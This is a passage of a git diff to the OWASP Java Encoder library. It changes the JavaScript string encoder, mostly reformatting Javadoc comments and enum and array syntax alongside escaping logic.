((ch >>> OCT_SHIFT) + '0'); + out[j++] = (char) ((ch & OCT_MASK) + '0'); + } + + continue; + } + } + + if (j + OCT_ESCAPE_LENGTH > m) { + return overflow(input, i, output, j); + } + out[j++] = '\\'; + out[j++] = (char) ((ch >>> 2 * OCT_SHIFT) + '0'); + out[j++] = (char) (((ch >>> OCT_SHIFT) & OCT_MASK) + '0'); + out[j++] = (char) ((ch & OCT_MASK) + '0'); + } else { + if (j + U_ESCAPE_LENGTH > m) { + return overflow(input, i, output, j); + } + out[j++] = '\\'; + out[j++] = 'u'; + out[j++] = HEX[ch >>> 3 * HEX_SHIFT]; + out[j++] = HEX[(ch >>> 2 * HEX_SHIFT) & HEX_MASK]; + out[j++] = HEX[(ch >>> HEX_SHIFT) & HEX_MASK]; + out[j++] = HEX[ch & HEX_MASK]; + } } } } diff --git a/core/src/main/java/org/owasp/encoder/JavaScriptEncoder.java b/core/src/main/java/org/owasp/encoder/JavaScriptEncoder.java index b7c0501..5ff0335 100644 --- a/core/src/main/java/org/owasp/encoder/JavaScriptEncoder.java +++ b/core/src/main/java/org/owasp/encoder/JavaScriptEncoder.java @@ -31,7 +31,6 @@ // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. - package org.owasp.encoder; import java.nio.CharBuffer; @@ -47,38 +46,35 @@ class JavaScriptEncoder extends Encoder { /** * Mode of operation constants for the JavaScriptEncoder. */ - static enum Mode { + enum Mode { /** - * Standard encoding of JavaScript Strings. Escape sequences are chosen - * according to what is the shortest sequence possible for the character. + * Standard encoding of JavaScript Strings. Escape sequences are chosen + * according to what is the shortest sequence possible for the + * character. */ SOURCE, - /** - * Encoding for use in HTML attributes. Quote characters are escaped - * using hex encodes instead of backslashes. The alternate would be - * to use a sequence of encodes that would actually be longer. In this - * mode double-quote is "\x22" and single-quote is "\x27". (In HTML + * Encoding for use in HTML attributes. Quote characters are escaped + * using hex encodes instead of backslashes. The alternate would be to + * use a sequence of encodes that would actually be longer. In this mode + * double-quote is "\x22" and single-quote is "\x27". (In HTML * attributes the alternate would be encoding "\"" and "\'" with entity * escapes to "\&#34;" and "\&39;"). */ ATTRIBUTE, - /** - * Encoding for use in HTML script blocks. The main concern here is + * Encoding for use in HTML script blocks. The main concern here is * permaturely terminating a script block with a closing "</" inside - * the string. This encoding escapes "/" as "\/" to prevent such + * the string. This encoding escapes "/" as "\/" to prevent such * termination. */ BLOCK, - /** * Encodes for use in either HTML script attributes or blocks. * Essentially this is both special escapes from HTML_ATTRIBUTE and * HTML_CONTENT combined. */ - HTML, - ; + HTML,; } /** @@ -86,21 +82,20 @@ class JavaScriptEncoder extends Encoder { */ private final Mode _mode; /** - * True if quotation characters should be hex encoded. Hex encoding - * quotes allows JavaScript to be included in XML attributes without - * additional XML-based encoding. + * True if quotation characters should be hex encoded. Hex encoding quotes + * allows JavaScript to be included in XML attributes without additional + * XML-based encoding. */ private final boolean _hexEncodeQuotes; /** * An array of 4 32-bit integers used as bitmasks to check if a character - * needs encoding or not. If the bit is set, the character is valid and - * does not need encoding. + * needs encoding or not. If the bit is set, the character is valid and does + * not need encoding. */ private final int[] _validMasks; /** - * True if the output should only include ASCII characters. Valid - * non-ASCII characters that would normally not be encoded, will be - * encoded. + * True if the output should only include ASCII characters. Valid non-ASCII + * characters that would normally not be encoded, will be encoded. */ private final boolean _asciiOnly; @@ -108,9 +103,8 @@ class JavaScriptEncoder extends Encoder { * Constructs a new JavaScriptEncoder for the specified contextual mode. * * @param mode the mode of operation - * @param asciiOnly true if only ASCII characters should be included - * in the output (all code-points outside the ASCII range will be - * encoded). + * @param asciiOnly true if only ASCII characters should be included in the + * output (all code-points outside the ASCII range will be encoded). */ JavaScriptEncoder(Mode mode, boolean asciiOnly) { // TODO: after some testing it appears that an array of int masks @@ -125,12 +119,11 @@ class JavaScriptEncoder extends Encoder { // the Java spec (x << y) where x and y are integers, is evaluated // as (x << (y & 31)). Or put another way, only the lower 5 bits // of the shift amount are considered. - _validMasks = new int[] { + _validMasks = new int[]{ 0, -1 & ~((1 << '\'') | (1 << '\"')), -1 & ~((1 << '\\')), - asciiOnly ? ~(1 << Unicode.DEL) : -1, - }; + asciiOnly ? ~(1 << Unicode.DEL) : -1,}; if (mode == Mode.BLOCK || mode == Mode.HTML) { // in